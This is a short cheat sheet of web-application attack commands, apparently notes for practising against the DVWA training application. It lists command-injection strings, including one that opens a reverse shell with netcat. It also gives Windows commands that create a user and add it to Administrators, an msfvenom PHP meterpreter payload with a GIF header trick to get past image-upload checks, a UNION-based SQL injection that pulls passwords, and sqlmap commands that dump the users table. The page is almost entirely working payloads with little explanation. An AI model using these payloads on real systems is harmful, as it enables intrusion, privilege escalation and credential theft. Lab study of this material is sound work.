Hacking Web Applications and Web Servers
Command Execution
Linux
127.0.0.1 && ls127.0.0.1 & ls127.0.0.1 & ls127.0.0.1 ; ls127.0.0.1 | ls- with space127.0.0.1 |ls- without space127.0.0.1 && nc -c sh 127.0.0.1 9001
Windows
hostnamewhoamitasklisttaskkill /PID 3112 /F- forcefully kills the processesdir c:\\net usernet user test /add- add a new usernet localgroup Administrators test /add- add test user to administratorsnet user test- details of the userdir c:\\”pin.txt”type c:\\”pin.txt”
Brute-Forcing
File Upload
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.phpexploit.php.imgGIf89a;- add this line to any file to make it as image fileuse multi/handler
SQL Injection
Manual
1’ UNION SELECT user, password FROM users#
Sqlmap
sqlmap -r req.txt --batchsqlmap -r req.txt --batch --level=5 --risk=3sqlmap -r req.txt --batch --level=5 --risk=3 --current-dbsqlmap -r req.txt -D dvwa --tablessqlmap -r req.txt -D dvwa -T users --columnssqlmap -r req.txt -D dvwa -T users --dump
Last updated
Was this helpful?